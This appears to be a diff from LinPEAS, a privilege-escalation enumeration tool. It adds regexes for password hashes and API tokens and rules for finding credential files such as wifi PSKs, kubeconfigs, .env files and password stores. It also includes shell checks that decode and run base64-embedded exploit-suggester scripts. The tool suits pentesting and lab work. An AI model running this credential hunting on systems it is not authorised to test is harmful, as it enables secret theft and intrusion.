+### Relate LinPEAS and WinPEAS with the Att&ck matrix
+- [ ] In the title of each check of LinPEAS and WinPEAS indicate between parenthesis and in grey the Tactic used. Example: **Enumerating something** (*T1234*)
+- [ ] Once the previous task is done, modify LinPEAS and WinPEAS to be able to indicate just the Tactic(s) that want to be executed so the scripts only execute the checks related to those tactics. Example: `linpeas.sh -T T1590,T1591`

build_lists/regexes.yaml

@@ -0,0 +1,204 @@
+paths:
+  - $HOMESEARCH 
+  - /etc 
+  - /opt 
+  - /tmp 
+  - /private
+  - /Applications
+  - /var/www
+  - /var/log
+  - /private/var/log
+  - /usr/local/www/ 
+  - $backup_folders_row
+
+
+regular_expresions:
+  # Hashes passwords
+  - name: Hashed Passwords
+    regexes:
+    - name: Apr1 MD5
+      regex: '\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
+    
+    - name: Apache SHA
+      regex: '\{SHA\}[0-9a-zA-Z/_=]{10,}'
+
+    - name: Blowfish
+      regex: '\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*'
+
+    - name: Drupal
+      regex: '\$S\$[a-zA-Z0-9_/\.]{52}'
+    
+    - name: Joomlavbulletin
+      regex: '[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}'
+
+    - name: Linux MD5
+      regex: '\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
+    
+    - name: phpbb3
+      regex: '\$H\$[a-zA-Z0-9_/\.]{31}'
+
+    - name: sha512crypt
+      regex: '\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}'
+    
+    - name: Wordpress
+      regex: '\$P\$[a-zA-Z0-9_/\.]{31}'
+  
+
+  # Raw Hashes
+  - name: Raw Hashes
+    regexes:
+    #- name: md5 #Too many false positives
+    #  regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)'
+    
+    #- name: sha1 #Too many false positives
+    #  regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)'
+
+    #- name: sha256 #Too many false positives
+    #  regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)'
+    
+    - name: sha512
+      regex: '(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)'
+
+  # APIs
+  # https://github.com/l4yton/RegHex/blob/master/README.md
+  - name: APIs
+    regexes:
+    #- name: Artifactory API Token # False +
+    #  regex: 'AKC[a-zA-Z0-9]{10,}' # False +
+    
+    #- name: Artifactory Password
+    #  regex: 'AP[\dABCDEF][a-zA-Z0-9]{8,}'
+    
+    #- name: Authorization Basic # Too many false positives
+    #  regex: 'basic [a-zA-Z0-9_:\.=\-]+'
+    
+    #- name: Authorization Bearer # Too many false positives
+    #  regex: 'bearer [a-zA-Z0-9_\.=\-]+'
+    
+    - name: AWS Client ID
+      regex: '(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'
+      extra_grep: '-Ev ":#|:<\!\-\-"'
+    
+    - name: AWS MWS Key
+      regex: 'amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
+
+    - name: AWS Secret Key
+      regex: aws(.{0,20})?['"][0-9a-zA-Z\/+]{40}['"]
+    
+    #- name: Base32 #Too many false positives
+    #  regex: '(?:[A-Z2-7]{8})*(?:[A-Z2-7]{2}={6}|[A-Z2-7]{4}={4}|[A-Z2-7]{5}={3}|[A-Z2-7]{7}=)?'
+    
+    #- name: Base64 #Too many false positives
+    #  regex: '(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[a-zA-Z0-9+/]+={0,2}'
+    
+    - name: Basic Auth Credentials
+      regex: '://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+'
+    
+    - name: Cloudinary Basic Auth
+      regex: 'cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+'
+
+    - name: Facebook Access Token
+      regex: 'EAACEdEose0cBA[0-9A-Za-z]+'
+
+    - name: Facebook Client ID
+      regex: ([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['"][0-9]{13,17}
+    
+    - name: Facebook Oauth
+      regex: >
+        [fF][aA][cC][eE][bB][oO][oO][kK].*['|"][0-9a-f]{32}['|"]
+    
+    - name: Facebook Secret Key
+      regex: > 
+        ([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['"][0-9a-f]{32}
+
+    - name: Github
+      regex: >
+        github(.{0,20})?['"][0-9a-zA-Z]{35,40}
+
+    - name: Google API Key
+      regex: 'AIza[0-9A-Za-z_\-]{35}'
+    
+    - name: Google Cloud Platform API Key
+      regex: >
+        (google|gcp|youtube|drive|yt)(.{0,20})?['"][AIza[0-9a-z_\-]{35}]['"]
+    
+    - name: Google Drive Oauth
+      regex: '[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com'
+    
+    - name: Google Oauth Access Token
+      regex: 'ya29\.[0-9A-Za-z_\-]+'
+    
+    - name: Heroku API Key
+      regex: '[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'
+
+    - name: LinkedIn Client ID
+      regex: >
+        linkedin(.{0,20})?['"][0-9a-z]{12}['"]
+
+    - name: LinkedIn Secret Key
+      regex: >
+        linkedin(.{0,20})?['"][0-9a-z]{16}['"]
+    
+    - name: Mailchamp API Key
+      regex: '[0-9a-f]{32}-us[0-9]{1,2}'
+    
+    - name: Mailgun API Key
+      regex: 'key-[0-9a-zA-Z]{32}'
+
+    - name: Picatic API Key
+      regex: 'sk_live_[0-9a-z]{32}'
+
+    - name: Slack Token
+      regex: 'xox[baprs]-([0-9a-zA-Z]{10,48})?'
+
+    #- name: Slack Webhook #Not interesting
+    #  regex: 'https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}'
+
+    - name: Stripe API Key
+      regex: 'k_live_[0-9a-zA-Z]{24}'
+
+    - name: Square Access Token
+      regex: 'sqOatp-[0-9A-Za-z_\-]{22}'
+
+    - name: Square Oauth Secret
+      regex: 'sq0csp-[ 0-9A-Za-z_\-]{43}'
+
+    - name: Twilio API Key
+      regex: 'SK[0-9a-fA-F]{32}'
+
+    - name: Twitter Client ID
+      regex: >
+        [tT][wW][iI][tT][tT][eE][rR](.{0,20})?['"][0-9a-z]{18,25}
+
+    - name: Twitter Oauth
+      regex: >
+        [tT][wW][iI][tT][tT][eE][rR].{0,30}['"\\s][0-9a-zA-Z]{35,44}['"\\s]
+
+    - name: Twitter Secret Key
+      regex: >
+        [tT][wW][iI][tT][tT][eE][rR](.{0,20})?['"][0-9a-z]{35,44}
+
+    #- name: Vault Token #False +
+    #  regex: '[sb]\.[a-zA-Z0-9]{24}'
+
+  
+  # Misc
+  - name: Misc
+    regexes:
+    - name: Basic Auth
+      regex: '//(.+):(.+)@'
+
+    - name: Passwords1
+      regex: (pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)
+    
+    #- name: Passwords2
+    #  regex: 'passwd|creden|pwd'
+    
+    - name: Usernames
+      regex: 'username.*[=:].+'
+
+    #- name: IPs
+    #  regex: '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
+    
+    #- name: Emails # Too many false positives
+    #  regex: '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}'

build_lists/sensitive_files.yaml

@@ -65,6 +65,9 @@ common_directory_folders:
   - /usr
   - /var
 
+peas_checks: "peass{CHECKS}"
+peas_regexes_markup: "peass{REGEXES}"
+
 peas_extrasections_markup: "peass{EXTRA_SECTIONS}"
 
 peas_finds_markup: "peass{FINDS_HERE}"
@@ -86,6 +89,8 @@ sudoVB1_markup: "peass{SUDOVB1_HERE}"
 sudoVB2_markup: "peass{SUDOVB2_HERE}"
 cap_setuid_markup: "peass{CAP_SETUID_HERE}"
 cap_setgid_markup: "peass{CAP_SETGID_HERE}"
+les_markup: "peass{LES}"
+les2_markup: "peass{LES2}"
 
 
 
@@ -109,6 +114,7 @@ variables:
 defaults:
   auto_check: False           #The builder will generate a check for the file (only linpeas)
   bad_regex: ""               #The regex used to color red. If only_bad_lines and no line_grep, then only lines containing this regex will be printed
+  very_bad_regex: ""          #The regex used to color yellow/red
   check_extra_path: ""        #Check if the found files are in a specific path (only linpeas)
   good_regex: ""              #The regex to color green
   just_list_file: False       #Just mention the path to the file, do not cat it
@@ -407,6 +413,15 @@ search:
                 search_in: 
                     - common
             
+            - name: "php.ini"
+              value: 
+                bad_regex: "On"
+                remove_regex: "^;"
+                line_grep: "allow_"
+                type: f
+                search_in: 
+                    - common
+
   - name: PHP Sessions
     value:
         config:
@@ -602,6 +617,58 @@ search:
               search_in: 
                 - common
   
+  - name: Wifi Connections
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: "system-connections"
+            value:         
+              files:
+                - name: "*"
+                  value:
+                      bad_regex: "psk.*"
+                      only_bad_lines:  True
+                      type: f
+              type: d
+              search_in: 
+                - /etc
+  
+  - name: PAM Auth
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: "pam.d"
+            value:         
+              files:
+                - name: "sshd"
+                  value:
+                      bad_regex: ".*"
+                      line_grep: '-i "auth"'
+                      remove_regex:  "^#|^@"
+                      type: f
+              type: d
+              search_in: 
+                - /etc
+  
+  - name: NFS Exports
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: exports
+            value: 
+                very_bad_regex: "no_root_squash|no_all_squash"
+                bad_regex: "insecure"
+                remove_regex: '\W+\#|^#'
+                type: f
+                search_in: 
+                  - /etc
+  
   - name: Anaconda ks
     value:
         config:
@@ -616,7 +683,6 @@ search:
                 search_in: 
                   - common
   
-
   - name: Racoon
     value:
         config:
@@ -640,6 +706,32 @@ search:
                 search_in: 
                   - common
 
+  - name: Kubelet
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: "kubelet"
+            value: 
+                files:
+                  - name: "kubeconfig"
+                    value:
+                        bad_regex: "server:|cluster:|namespace:|user:|exec:"
+                type: d
+                search_in: 
+                  - /var
+          
+          - name: "kube-proxy"
+            value: 
+                files:
+                  - name: "kubeconfig"
+                    value:
+                        bad_regex: "cluster:|certificate-authority-data:|namespace:|user:|token:"
+                type: d
+                search_in: 
+                  - /var
+  
   - name: VNC
     value:
         config:
@@ -704,6 +796,21 @@ search:
                 search_in: 
                   - common
   
+  - name: Log4Shell
+    value:
+        config:
+          auto_check: False
+    
+        files:
+          - name: "log4j-core*.jar"
+            value: 
+                type: f
+                search_in: 
+                  - common
+                  - /lib
+                  - /lib32
+                  - /lib64
+
   - name: OpenVPN
     value:
         config:
@@ -957,6 +1064,24 @@ search:
                 search_in: 
                   - common
           
+          - name: "secrets.ldb"
+            value: 
+                type: f
+                search_in: 
+                  - common
+          
+          - name: ".secrets.mkey"
+            value: 
+                type: f
+                search_in: 
+                  - common
+          
+          - name: "sssd.conf"
+            value: 
+                type: f
+                search_in: 
+                  - common
+
   - name: Kibana
     value:
         config:
@@ -1890,7 +2015,7 @@ search:
           auto_check: False
 
         files:
-          - name: ".*_history.*"
+          - name: '*_history*'
             value: 
                 bad_regex: "$pwd_inside_history"
                 line_grep: '-a "$pwd_inside_history"'
@@ -1952,7 +2077,7 @@ search:
         files:
           - name: ".env"
             value: 
-                bad_regex: "[pP][aA][sS][sS].*"
+                bad_regex: "[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB]"
                 remove_regex: '^#'
                 remove_empty_lines: True
                 type: f
@@ -1974,6 +2099,57 @@ search:
                 search_in: 
                   - common
   
+  - name: InfluxDB
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: "influxdb.conf"
+            value: 
+                bad_regex: "auth-enabled.*=.*false|token|https-private-key"
+                remove_regex: '^#'
+                remove_empty_lines: True
+                type: f
+                search_in: 
+                  - common
+  
+  - name: Zabbix
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: "zabbix_server.conf"
+            value: 
+                bad_regex: "DBName|DBUser|DBPassword"
+                remove_regex: '^#'
+                remove_empty_lines: True
+                type: f
+                search_in: 
+                  - common
+          
+          - name: "zabbix_agentd.conf"
+            value: 
+                bad_regex: "TLSPSKFile|psk"
+                remove_regex: '^#'
+                remove_empty_lines: True
+                type: f
+                search_in: 
+                  - common
+          
+          - name: "zabbix"
+            value: 
+              files:
+                - name: "*.psk"
+                  value:
+                      bad_regex: ".*"
+                      remove_empty_lines: True
+              type: d
+              search_in: 
+                - common
+
+  
   - name: Github
     value:
         config:
@@ -2055,6 +2231,32 @@ search:
                 search_in: 
                   - common
         
+  - name: Pre-Shared Keys
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: "*.psk"
+            value: 
+                just_list_file: True
+                type: f
+                search_in: 
+                  - common
+  
+  - name: Pass Store Directories
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: ".password-store"
+            value: 
+                just_list_file: True
+                type: d
+                search_in: 
+                  - common
+
   - name: FTP
     value:
         config:
@@ -2277,11 +2479,58 @@ search:
                         bad_regex: "database_pw.*|database_user.*|database_pass.*"
                         line_grep: '"database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl"'
 
+                type: d
+                search_in: 
+                  - common
+  
+  - name: Roundcube
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: "roundcube"
+            value:
+                files:
+                  - name: "config.inc.php"
+                    value:
+                        bad_regex: "db_dsnw"
+                        line_grep: '"config\["'
 
                 type: d
                 search_in: 
                   - common
   
+  - name: Passbolt
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: "passbolt.php"
+            value: 
+                bad_regex: "[pP][aA][sS][sS].*|[uU][sS][eE][rR].*"
+                line_grep: '"host|port|username|password|database"'
+                remove_empty_lines: True
+                remove_regex: '^#'
+                type: f
+                search_in: 
+                  - common
+
+  - name: Jetty
+    value:
+        config:
+          auto_check: True
+
+        files:
+          - name: "jetty-realm.properties"
+            value: 
+                bad_regex: ".*"
+                remove_empty_lines: True
+                remove_regex: '^#'
+                type: f
+                search_in: 
+                  - common
   
   - name: Wget
     value:
@@ -2575,13 +2824,6 @@ search:
                 search_in:
                   - common
 
-          - name: "php.ini"
-            value:
-                just_list_file: True
-                type: f
-                search_in:
-                  - common
-
           - name: "printers.xml"
             value: 
                 just_list_file: True

linPEAS/builder/linpeas_builder.py

@@ -1,5 +1,6 @@
 from .src.peasLoaded import PEASLoaded
 from .src.linpeasBuilder import LinpeasBuilder
+from .src.linpeasBaseBuilder import LinpeasBaseBuilder
 from .src.yamlGlobals import FINAL_LINPEAS_PATH
 
 import os
@@ -7,7 +8,14 @@ import stat
 
 #python3 -m builder.linpeas_builder
 def main():
+    # Load configuration
     ploaded = PEASLoaded()
+
+    # Build temporary  linpeas_base.sh file
+    lbasebuilder = LinpeasBaseBuilder()
+    lbasebuilder.build()
+
+    # Build final linpeas.sh
     lbuilder = LinpeasBuilder(ploaded)
     lbuilder.build()
     lbuilder.write_linpeas(FINAL_LINPEAS_PATH)

linPEAS/builder/linpeas_parts/1_system_information.sh

@@ -0,0 +1,221 @@
+###########################################
+#-------------) System Info (-------------#
+###########################################
+
+#-- SY) OS
+print_2title "Operative system"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits"
+(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
+warn_exec lsb_release -a 2>/dev/null
+if [ "$MACPEAS" ]; then
+    warn_exec system_profiler SPSoftwareDataType
+fi
+echo ""
+
+#-- SY) Sudo
+print_2title "Sudo version"
+if [ "$(command -v sudo 2>/dev/null)" ]; then
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version"
+sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
+else echo_not_found "sudo"
+fi
+echo ""
+
+#--SY) USBCreator
+if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
+    print_2title "USBCreator"
+    print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
+
+    pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
+    if [ -z "$pc_version" ]; then
+        pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
+    fi
+    if [ -n "$pc_version" ]; then
+        pc_length=${#pc_version}
+        pc_major=$(echo "$pc_version" | cut -d. -f1)
+        pc_minor=$(echo "$pc_version" | cut -d. -f2)
+        if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor"  -lt 21 ]; then
+            echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
+        fi
+    fi
+fi
+echo ""
+
+#-- SY) PATH
+print_2title "PATH"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses"
+echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
+echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g"
+echo ""
+
+#-- SY) Date
+print_2title "Date & uptime"
+warn_exec date 2>/dev/null
+warn_exec uptime 2>/dev/null
+echo ""
+
+#-- SY) System stats
+if [ "$EXTRA_CHECKS" ]; then
+    print_2title "System stats"
+    (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
+    warn_exec free 2>/dev/null
+    echo ""
+fi
+
+#-- SY) CPU info
+if [ "$EXTRA_CHECKS" ]; then
+    print_2title "CPU info"
+    warn_exec lscpu 2>/dev/null
+    echo ""
+fi
+
+if [ -d "/dev" ] || [ "$DEBUG" ] ; then
+    print_2title "Any sd*/disk* disk in /dev? (limit 20)"
+    ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
+    echo ""
+fi
+
+if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
+    print_2title "Unmounted file-system?"
+    print_info "Check if you can mount umounted devices"
+    grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
+    echo ""
+fi
+
+if ([ "$(command -v diskutil)" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
+    print_2title "Mounted disks information"
+    warn_exec diskutil list
+    echo ""
+fi
+
+if [ "$(command -v smbutil)" ] || [ "$DEBUG" ]; then
+    print_2title "Mounted SMB Shares"
+    warn_exec smbutil statshares -a
+    echo ""
+fi
+
+#-- SY) Environment vars
+print_2title "Environment"
+print_info "Any private information inside environment variables?"
+(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_KUBELET" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set"
+echo ""
+
+#-- SY) Dmesg
+if [ "$(command -v dmesg 2>/dev/null)" ] || [ "$DEBUG" ]; then
+    print_2title "Searching Signature verification failed in dmesg"
+    print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed"
+    (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
+    echo ""
+fi
+
+#-- SY) Kernel extensions
+if [ "$MACPEAS" ]; then
+    print_2title "Kernel Extensions not belonging to apple"
+    kextstat 2>/dev/null | grep -Ev " com.apple."
+
+    print_2title "Unsigned Kernel Extensions"
+    macosNotSigned /Library/Extensions
+    macosNotSigned /System/Library/Extensions
+fi
+
+if [ "$(command -v bash 2>/dev/null)" ]; then
+    print_2title "Executing Linux Exploit Suggester"
+    print_info "https://github.com/mzet-/linux-exploit-suggester"
+    les_b64="peass{LES}"
+    if [ "$EXTRA_CHECKS" ]; then
+        echo $les_b64 | base64 -d | bash -s -- --checksec | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | sed -E "s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g"
+    else
+        echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,\[CVE-[0-9]+-[0-9]+\],*,${SED_RED},g"
+    fi
+    echo ""
+fi
+
+if [ "$(command -v perl 2>/dev/null)" ]; then
+    print_2title "Executing Linux Exploit Suggester 2"
+    print_info "https://github.com/jondonas/linux-exploit-suggester-2"
+    les2_b64="peass{LES2}"
+    echo $les2_b64 | base64 -d | perl | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
+    echo ""
+fi
+
+if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null)" ]; then
+    print_2title "Brew Doctor Suggestions"
+    brew doctor
+    echo ""
+fi
+
+
+
+#-- SY) AppArmor
+print_2title "Protections"
+print_list "AppArmor enabled? .............. "$NC
+if [ "$(command -v aa-status 2>/dev/null)" ]; then
+    aa-status 2>&1 | sed "s,disabled,${SED_RED},"
+elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then
+    apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
+elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
+    ls -d /etc/apparmor*
+else
+    echo_not_found "AppArmor"
+fi
+
+#-- SY) grsecurity
+print_list "grsecurity present? ............ "$NC
+( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
+
+#-- SY) PaX
+print_list "PaX bins present? .............. "$NC
+(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
+
+#-- SY) Execshield
+print_list "Execshield enabled? ............ "$NC
+(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
+
+#-- SY) SElinux
+print_list "SELinux enabled? ............... "$NC
+(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
+
+#-- SY) Gatekeeper
+if [ "$MACPEAS" ]; then
+    print_list "Gatekeeper enabled? .......... "$NC
+    (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
+
+    print_list "sleepimage encrypted? ........ "$NC
+    (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
+
+    print_list "XProtect? .................... "$NC
+    (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
+
+    print_list "SIP enabled? ................. "$NC
+    csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
+
+    print_list "Connected to JAMF? ........... "$NC
+    warn_exec jamf checkJSSConnection
+
+    print_list "Connected to AD? ............. "$NC
+    dsconfigad -show && echo "" || echo_no
+fi
+
+#-- SY) ASLR
+print_list "Is ASLR enabled? ............... "$NC
+ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
+if [ -z "$ASLR" ]; then
+    echo_not_found "/proc/sys/kernel/randomize_va_space";
+else
+    if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
+    echo ""
+fi
+
+#-- SY) Printer
+print_list "Printer? ....................... "$NC
+(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
+
+#-- SY) Running in a virtual environment
+print_list "Is this a virtual machine? ..... "$NC
+hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
+if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then
+    detectedvirt=$(systemd-detect-virt)
+    if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
+else
+    if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
+fi

linPEAS/builder/linpeas_parts/2_container.sh

@@ -0,0 +1,237 @@
+###########################################
+#---------) Container functions (---------#
+###########################################
+
+containerCheck() {
+  inContainer=""
+  containerType="$(echo_no)"
+
+  # Are we inside docker?
+  if [ -f "/.dockerenv" ] ||
+    grep "/docker/" /proc/1/cgroup -qa 2>/dev/null ||
+    grep -qai docker /proc/self/cgroup  2>/dev/null ||
+    [ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then
+
+    inContainer="1"
+    containerType="docker\n"
+  fi
+
+  # Are we inside kubenetes?
+  if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null ||
+    grep -qai kubepods /proc/self/cgroup 2>/dev/null; then
+
+    inContainer="1"
+    if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n"
+    else containerType="kubernetes\n"
+    fi
+  fi
+
+  # Are we inside LXC?
+  if env | grep "container=lxc" -qa 2>/dev/null ||
+      grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then
+
+    inContainer="1"
+    containerType="lxc\n"
+  fi
+
+  # Are we inside podman?
+  if env | grep -qa "container=podman" 2>/dev/null ||
+      grep -qa "container=podman" /proc/1/environ 2>/dev/null; then
+
+    inContainer="1"
+    containerType="podman\n"
+  fi
+
+  # Check for other container platforms that report themselves in PID 1 env
+  if [ -z "$inContainer" ]; then
+    if grep -a 'container=' /proc/1/environ 2>/dev/null; then
+      inContainer="1"
+      containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n"
+    fi
+  fi
+}
+
+inDockerGroup() {
+  DOCKER_GROUP="No"
+  if groups 2>/dev/null | grep -q '\bdocker\b'; then
+    DOCKER_GROUP="Yes"
+  fi
+}
+
+checkDockerRootless() {
+  DOCKER_ROOTLESS="No"
+  if docker info 2>/dev/null|grep -q rootless; then
+    DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)"
+  fi
+}
+
+enumerateDockerSockets() {
+  dockerVersion="$(echo_not_found)"
+  if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
+    SEARCHED_DOCKER_SOCKETS="1"
